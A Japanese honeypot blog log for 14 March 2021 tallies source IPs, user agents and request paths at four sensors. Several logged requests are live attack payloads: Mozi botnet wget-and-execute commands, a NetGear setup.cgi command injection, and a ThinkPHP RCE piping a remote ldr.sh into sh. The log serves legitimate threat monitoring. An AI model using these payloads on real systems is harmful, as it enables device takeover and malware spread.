2021/03/14 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2021/03/14分です。

特徴

共通

Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Laravelへのスキャン行為
WordPressへのスキャン行為
WordPress Pluginへのスキャン行為

Location：JP

GPONルータの脆弱性を狙うアクセス
fasthttpによるスキャン行為
.cssへのスキャン行為
.jsへのスキャン行為
110[.]242[.]68[.]4に関する不正通信
UserAgentがHello, Worldであるアクセス
を確認しました。

Location：US

fasthttpによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
110[.]242[.]68[.]4に関する不正通信
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//39[.]76[.]80[.]40:43887/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

Location：UK

GPONルータの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
5[.]188[.]210[.]227に関する不正通信
UserAgentがHello, Worldであるアクセス
を確認しました。

Location：SG

NetGear製品の脆弱性を狙うアクセス
aiohttpによるスキャン行為
fasthttpによるスキャン行為
IDBTE4M CODE87によるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。

他

アクセス数推移

JP：総アクセス数：197 (前日比：+90)
US：総アクセス数：68 (前日比：-101)
UK：総アクセス数：84 (前日比：+12)
SG：総アクセス数：111 (前日比：+10)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	1.85.216.20	China
1	1.202.113.130	China
1	13.68.129.190	United States
1	34.240.10.73	United States
1	36.106.166.240	China
1	36.106.167.143	China
4	42.122.50.23	China
11	45.155.205.225	Russia
6	51.158.24.215	France
2	52.230.67.90	United States
6	54.221.161.245	United States
6	81.68.229.2	China
1	110.167.215.197	China
1	110.177.180.225	China
1	113.58.228.238	China
1	113.128.104.99	China
1	115.148.155.127	China
89	117.50.104.245	China
6	118.24.107.10	China
1	119.39.46.50	China
10	119.45.207.135	China
1	119.118.1.32	China
1	119.118.12.178	China
1	123.12.254.154	China
1	123.245.24.89	China
1	123.245.25.172	China
1	137.135.86.50	United States
1	150.107.204.109	Nepal
1	150.136.75.66	United States
1	157.90.160.102	Germany
1	180.95.238.212	China
1	182.88.78.138	China
16	185.204.1.224	Czechia
1	192.40.57.233	United States
1	192.46.225.101	United States
6	192.46.227.196	United States
1	196.70.65.221	Morocco
1	196.206.94.177	Morocco
1	199.249.230.83	United States
1	205.185.127.244	United States
1	218.58.36.163	China
1	219.143.174.39	China
1	220.200.167.212	China
1	221.13.12.68	China
1	221.198.83.194	China
1	223.166.75.150	China

UserAgent一覧

件数	UserAgent
19	-
7	Go-http-client/1.1
1	Hello, World
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
83	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
11	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
11	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
15	Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
9	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1	Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5
11	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
2	Mozilla/5.01717655 Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
8	PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
16	fasthttp

リクエスト内容一覧

件数	Method	Request	Protocol
6		-
1		\x01
2	CONNECT	cn[.]bing[.]com/:443	HTTP/1.1
2	CONNECT	www[.]baidu[.]com/:443	HTTP/1.1
2	CONNECT	www[.]so[.]com/:443	HTTP/1.1
2	CONNECT	www[.]voanews[.]com/:443	HTTP/1.1
12	GET	/.env	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
5	GET	/?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1]=curl+--user-agent+curl_tp5+http[:]//31[.]210[.]20[.]181/ldr.sh	sh\|HTTP/1.1
1	GET	/Content/common/web/CommonActivity.css	HTTP/1.1
1	GET	/Front/FctPage/Start.aspx	HTTP/1.1
1	GET	/Home/Bind/binding	HTTP/1.1
1	GET	/JS/loginstatus.js	HTTP/1.1
1	GET	/Public/Mobile/ecshe_css/wapmain.css?v=1545408652	HTTP/1.1
1	GET	/Public/Wchat/js/cvphp.js	HTTP/1.1
1	GET	/Public/css/_pk10.css	HTTP/1.1
1	GET	/Public/home/common/js/index.js	HTTP/1.1
1	GET	/Public/home/js/fukuang.js	HTTP/1.1
1	GET	/TP/html/public/index.php	HTTP/1.1
1	GET	/TP/index.php	HTTP/1.1
1	GET	/TP/public/index.php	HTTP/1.1
1	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/admin	HTTP/1.1
1	GET	/admin_user/consume.php	HTTP/1.1
1	GET	/ajax/allcoin_a/id/0?t=0.3782499195965951	HTTP/1.1
1	GET	/anquan/qgga.asp	HTTP/1.1
1	GET	/api/content_bottom	HTTP/1.1
1	GET	/api/currency/quotation_new	HTTP/1.1
1	GET	/api/product/topRank?token=null&uid=null&lang=null&direct=1&type=1	HTTP/1.1
1	GET	/api/site/getInfo.do	HTTP/1.1
1	GET	/api/uploads/apimap	HTTP/1.1
1	GET	/api/user/info?&&callback=jsonp_1601457046411_20983	HTTP/1.1
1	GET	/api/v/index/queryOfficePage?officeCode=customHomeLink	HTTP/1.1
1	GET	/assets/dist/static/js/vendor_prod.js	HTTP/1.1
1	GET	/assets/extension/market/css/mt4.css	HTTP/1.1
1	GET	/assets/room/css/room_mobile.css	HTTP/1.1
1	GET	/base/exchange_article/index/classid/1/id/1	HTTP/1.1
1	GET	/base/exchange_index/changepwdfirst	HTTP/1.1
1	GET	/base/goexjs	HTTP/1.1
1	GET	/check.php	HTTP/1.1
1	GET	/common/member/js/user.util.js	HTTP/1.1
1	GET	/common/template/lottery/lecai/css/style.css	HTTP/1.1
1	GET	/config.php?_=3283&1922563758	HTTP/1.1
1	GET	/config/getuser?index=0	HTTP/1.1
1	GET	/console/	HTTP/1.1
1	GET	/cq/kehulistajax.php	HTTP/1.1
1	GET	/csjs/bankCheck.js	HTTP/1.1
1	GET	/css/all.css	HTTP/1.1
1	GET	/css/app.css	HTTP/1.1
1	GET	/css/info.css	HTTP/1.1
1	GET	/data/json/config.json	HTTP/1.1
1	GET	/elrekt.php	HTTP/1.1
1	GET	/favicon.ico	HTTP/1.1
1	GET	/ff/css/cssy.css	HTTP/1.1
1	GET	/getConfig/getArticle.do?code=19	HTTP/1.1
1	GET	/getConfig/listPopFrame.do?code=14&position=index&_=1601489645097	HTTP/1.1
1	GET	/getLocale	HTTP/1.1
1	GET	/home/login/login_index.html	HTTP/1.1
1	GET	/html/public/index.php	HTTP/1.1
1	GET	/iframe/rankgiftgotapi/1005	HTTP/1.1
1	GET	/index.php	HTTP/1.1
1	GET	/index.php/sign	HTTP/1.1
1	GET	/index.php?m=api&c=app&a=getPlatformConfig	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
1	GET	/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
1	GET	/index/login/register	HTTP/1.1
1	GET	/ipl/app/flash/publicbmw/ball/FigLeaf.js?site=member	HTTP/1.1
6	GET	/jenkins/login	HTTP/1.0
1	GET	/jiaoyimao/default.css	HTTP/1.1
1	GET	/js/base1.js	HTTP/1.1
1	GET	/js/common.js	HTTP/1.1
1	GET	/js/dianzan.js	HTTP/1.1
1	GET	/js/json.js	HTTP/1.1
1	GET	/langConfig.js	HTTP/1.1
6	GET	/login	HTTP/1.0
1	GET	/login/img/nyyh/chkjs.js	HTTP/1.1
1	GET	/m/allticker/1	HTTP/1.1
6	GET	/manager/html	HTTP/1.1
1	GET	/mobile/config.js	HTTP/1.1
1	GET	/mobile/script/main.m.js	HTTP/1.1
1	GET	/myConfig.js	HTTP/1.1
1	GET	/nyyh/game.css	HTTP/1.1
1	GET	/public/index.php	HTTP/1.1
1	GET	/public/wap/js/basis.js	HTTP/1.1
1	GET	/public/web/js/add/com.js	HTTP/1.1
1	GET	/resources/css/headernav.css	HTTP/1.1
1	GET	/resources/main/common.js	HTTP/1.1
1	GET	/room/1002	HTTP/1.1
1	GET	/s_api/basic/config_js?callback=__set_config	HTTP/1.1
1	GET	/s_api/basic/download/info	HTTP/1.1
1	GET	/skin/js/common.js	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/static/css/index.css	HTTP/1.1
1	GET	/static/data/configjs.js	HTTP/1.1
1	GET	/static/data/thirdgames.json	HTTP/1.1
1	GET	/static/guide/ab.css	HTTP/1.1
1	GET	/static/home/css/css.css	HTTP/1.1
1	GET	/static/xianyu/js/bankCheck.js	HTTP/1.1
1	GET	/step1.asp	HTTP/1.1
1	GET	/style.css	HTTP/1.1
1	GET	/template/css/login.css	HTTP/1.1
1	GET	/template/js/comm/Confrim.js	HTTP/1.1
1	GET	/thinkphp/html/public/index.php	HTTP/1.1
1	GET	/user/userlist	HTTP/1.1
1	GET	/v1/management/tenant/getSpeedDomain	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/views/home/home.js	HTTP/1.1
1	GET	/web/api/getBanner	HTTP/1.1
1	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
6	GET	/wp-login.php	HTTP/1.1
1	GET	/ws/index/getTheLotteryInitList	HTTP/1.1
1	GET	/zz2/address.php?gid=651	HTTP/1.1
1	GET	http[:]//dongtaiwang[.]com/	HTTP/1.1
2	GET	http[:]//www[.]epochtimes[.]com/	HTTP/1.1
2	GET	http[:]//www[.]minghui[.]org/	HTTP/1.1
2	GET	http[:]//www[.]rfa[.]org/english/	HTTP/1.1
2	GET	http[:]//www[.]soso[.]com/	HTTP/1.1
2	GET	http[:]//www[.]wujieliulan[.]com/	HTTP/1.1
2	HEAD	http[:]//110[.]242[.]68[.]4/	HTTP/1.1
1	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
1	POST	/GponForm/diag_Form?images/	HTTP/1.1
1	POST	/RPC2	HTTP/1.1
5	POST	/_ignition/execute-solution	HTTP/1.1
1	POST	/api/jsonws/invoke	HTTP/1.1
1	POST	/config	HTTP/1.1
1	POST	/index.php?s=captcha	HTTP/1.1
1	POST	/lib/phpunit/Util/PHP/eval-stdin.php	HTTP/1.1
1	POST	/lib/phpunit/phpunit/Util/PHP/eval-stdin.php	HTTP/1.1
1	POST	/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	POST	/lib/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	POST	/phpunit/Util/PHP/eval-stdin.php	HTTP/1.1
1	POST	/phpunit/phpunit/Util/PHP/eval-stdin.php	HTTP/1.1
1	POST	/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	POST	/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	POST	/vendor/phpunit/Util/PHP/eval-stdin.php	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php	HTTP/1.1
2	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	POST	/vendor/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	POST	/wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	POST	/wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	POST	/wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	39.76.80.40	China
11	45.155.205.225	Russia
2	49.49.239.77	Thailand
1	106.45.10.227	China
1	115.87.35.30	Thailand
6	123.58.242.2	China
3	145.239.82.0	France
3	163.172.168.251	United Kingdom
1	172.105.89.161	United States
1	178.238.8.230	United Kingdom
32	185.204.1.217	Czechia
4	198.20.99.130	United States
1	205.185.127.244	United States
1	212.47.229.4	France

UserAgent一覧

件数	UserAgent
11	-
1	Go-http-client/1.1
1	Hello, world
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
2	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36
2	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1; rv:60.5.2) Gecko/20100101 Firefox/60.5.2
11	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
3	Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
1	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1	Mozilla/5.01682558 Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/537.36(KHTML, like Gecko) Chrome/40.0.2214.89 Safari/537.36
1	User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705
32	fasthttp

リクエスト内容一覧

件数	Method	Request	Protocol
1		\x01
2		\x16\x03\x01
2	CONNECT	www[.]bing[.]com/:443	HTTP/1.1
1	GET	/.env	HTTP/1.1
1	GET	/.well-known/security.txt	HTTP/1.1
1	GET	/0bef	HTTP/1.0
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1]=curl+--user-agent+curl_tp5+http[:]//31[.]210[.]20[.]181/ldr.sh	sh\|HTTP/1.1
1	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/config/getuser?index=0	HTTP/1.1
1	GET	/console/	HTTP/1.1
1	GET	/favicon.ico	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
1	GET	/jenkins/login	HTTP/1.0
1	GET	/login	HTTP/1.0
2	GET	/manager/html	HTTP/1.1
1	GET	/robots.txt	HTTP/1.1
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//39[.]76[.]80[.]40:43887/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	HTTP/1.1
1	GET	/sitemap.xml	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
1	GET	/wp-login.php	HTTP/1.1
2	GET	http[:]//www[.]bing[.]com/	HTTP/1.1
1	HEAD	http[:]//110[.]242[.]68[.]4/	HTTP/1.1
1	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
2	POST	/RPC2	HTTP/1.1
1	POST	/_ignition/execute-solution	HTTP/1.1
1	POST	/api/jsonws/invoke	HTTP/1.1
2	POST	/lib/phpunit/Util/PHP/eval-stdin.php	HTTP/1.1
2	POST	/lib/phpunit/phpunit/Util/PHP/eval-stdin.php	HTTP/1.1
2	POST	/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
2	POST	/lib/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
2	POST	/phpunit/Util/PHP/eval-stdin.php	HTTP/1.1
2	POST	/phpunit/phpunit/Util/PHP/eval-stdin.php	HTTP/1.1
2	POST	/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
2	POST	/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
2	POST	/vendor/phpunit/Util/PHP/eval-stdin.php	HTTP/1.1
2	POST	/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php	HTTP/1.1
3	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
2	POST	/vendor/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
2	POST	/wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
2	POST	/wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
2	POST	/wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	POST	http[:]//lisalancaster[.]site/5bc94e9d4a97bbf5bb4bba6747440631dbb75ea4d7d78dd4a8d53e30f2b09b2f66d02938621aa897dc622fe7016d9bfbadd9e6780a9f6684c388bc51b93b8d28e9f069ef0228e16bf6b991d3a7208f37330b38f29f03092d0479b25e0570f837	HTTP/1.1
1	POST	http[:]//niezwykla[.]website/c0a5d4cef8f92e707b2c85ceb251259b5540ec6f8f4cb27d6726417a85618d41fa36a0f45e2eb6c8eca6f3d87f0cea627d7e580e98ba60d837ed94acd4500edb0aff656871338603dcaaa12339edd6b1af0fbb399d541863e0e991df5f4586ad	HTTP/1.1

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	1.202.112.56	China
1	1.222.140.71	South Korea
1	5.188.210.227	Russia
1	27.224.136.121	China
1	27.224.137.216	China
6	35.183.174.33	United States
1	43.231.128.130	Indonesia
11	45.155.205.225	Russia
6	64.225.4.154	United States
6	103.18.69.186	India
1	110.167.215.214	China
1	119.39.46.168	China
1	123.160.234.23	China
1	123.245.25.253	China
1	124.88.55.38	China
9	132.145.19.203	United States
15	132.145.108.16	United States
3	132.145.245.240	United States
6	157.245.101.34	United States
1	172.104.242.173	United States
1	183.160.251.27	China
1	183.191.125.148	China
1	205.185.127.244	United States
6	218.108.238.165	China
1	221.213.75.8	China

UserAgent一覧

件数	UserAgent
11	-
5	Go-http-client/1.1
1	Hello, World
3	Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)
1	Mozilla/4.01687919 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; Media Center PC 6.0)
3	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1
3	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2
3	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
6	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
11	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
6	Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
1	Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
15	Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
3	Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02
3	Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
1	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1
1	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
4	PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3

リクエスト内容一覧

件数	Method	Request	Protocol
1	CONNECT	cn[.]bing[.]com/:443	HTTP/1.1
1	CONNECT	www[.]baidu[.]com/:443	HTTP/1.1
1	CONNECT	www[.]so[.]com/:443	HTTP/1.1
1	CONNECT	www[.]voanews[.]com/:443	HTTP/1.1
1	GET	/.env	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
5	GET	/?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1]=curl+--user-agent+curl_tp5+http[:]//31[.]210[.]20[.]181/ldr.sh	sh\|HTTP/1.1
1	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/config/getuser?index=0	HTTP/1.1
1	GET	/console/	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
5	GET	/jenkins/login	HTTP/1.0
5	GET	/login	HTTP/1.0
5	GET	/manager/html	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
5	GET	/wp-login.php	HTTP/1.1
1	GET	http[:]//5[.]188[.]210[.]227/echo.php	HTTP/1.1
1	GET	http[:]//dongtaiwang[.]com/	HTTP/1.1
1	GET	http[:]//www[.]epochtimes[.]com/	HTTP/1.1
1	GET	http[:]//www[.]minghui[.]org/	HTTP/1.1
1	GET	http[:]//www[.]rfa[.]org/english/	HTTP/1.1
1	GET	http[:]//www[.]soso[.]com/	HTTP/1.1
1	GET	http[:]//www[.]wujieliulan[.]com/	HTTP/1.1
1	HEAD	http[:]//110[.]242[.]68[.]4/	HTTP/1.1
1	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
1	POST	/GponForm/diag_Form?images/	HTTP/1.1
5	POST	/_ignition/execute-solution	HTTP/1.1
9	POST	/api/jsonws/expandocolumn/update-column	HTTP/1.1
1	POST	/api/jsonws/invoke	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
18	POST	/zend3/public/	HTTP/1.1
1		\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	8.210.159.44	Singapore
1	13.66.246.180	United States
6	18.141.222.223	United States
11	45.155.205.225	Russia
5	50.31.21.4	United States
1	59.97.169.111	India
1	103.207.0.134	India
1	112.94.96.132	China
10	117.50.137.13	China
1	129.146.190.190	United States
1	149.129.55.193	Singapore
1	156.146.35.175	United Kingdom
3	163.172.161.118	United Kingdom
6	167.71.235.145	United States
1	172.104.242.173	United States
1	172.105.89.161	United States
1	178.175.60.59	Albania
6	183.82.126.193	India
48	193.138.218.224	Sweden
1	202.164.138.8	India
1	205.185.127.244	United States
3	212.47.244.68	France

UserAgent一覧

件数	UserAgent
17	-
3	Go-http-client/1.1
2	Hello, World
1	Hello, world
1	IDBTE4M CODE87
5	Mozilla/5.0 (Linux; Android 10; SM-A102U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Mobile Safari/537.36
2	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2; rv:50.0) Gecko/20100101 Firefox/50.0
2	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36
11	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
6	Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
9	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
2	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1	Python/3.6 aiohttp/3.7.3
48	fasthttp

リクエスト内容一覧

件数	Method	Request	Protocol
5		\x16\x03\x01\x02
2	CONNECT	www[.]bing[.]com/:443	HTTP/1.1
3	GET	/.env	HTTP/1.1
1	GET	/0bef	HTTP/1.0
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
2	GET	/?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1]=curl+--user-agent+curl_tp5+http[:]//31[.]210[.]20[.]181/ldr.sh	sh\|HTTP/1.1
1	GET	/HNAP1	HTTP/1.1
1	GET	/TP/html/public/index.php	HTTP/1.1
1	GET	/TP/index.php	HTTP/1.1
1	GET	/TP/public/index.php	HTTP/1.1
1	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/config/getuser?index=0	HTTP/1.1
1	GET	/console/	HTTP/1.1
1	GET	/elrekt.php	HTTP/1.1
1	GET	/evox/about	HTTP/1.1
1	GET	/html/public/index.php	HTTP/1.1
1	GET	/index.php	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
1	GET	/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
2	GET	/jenkins/login	HTTP/1.0
2	GET	/login	HTTP/1.0
2	GET	/manager/html	HTTP/1.1
1	GET	/nmaplowercheck1615600848	HTTP/1.1
1	GET	/public/index.php	HTTP/1.1
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//103[.]207[.]0[.]134:57440/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	HTTP/1.0
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	HTTP/1.0
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//202[.]164[.]138[.]8:43027/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/thinkphp/html/public/index.php	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/virtualRadar/	HTTP/1.1
1	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
2	GET	/wp-login.php	HTTP/1.1
2	GET	http[:]//passport[.]baidu[.]com/	HTTP/1.1
2	GET	http[:]//www[.]bing[.]com/	HTTP/1.1
1	HEAD	/	HTTP/1.1
1	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
2	POST	/GponForm/diag_Form?images/	HTTP/1.1
3	POST	/RPC2	HTTP/1.1
2	POST	/_ignition/execute-solution	HTTP/1.1
1	POST	/api/jsonws/invoke	HTTP/1.1
1	POST	/index.php?s=captcha	HTTP/1.1
3	POST	/lib/phpunit/Util/PHP/eval-stdin.php	HTTP/1.1
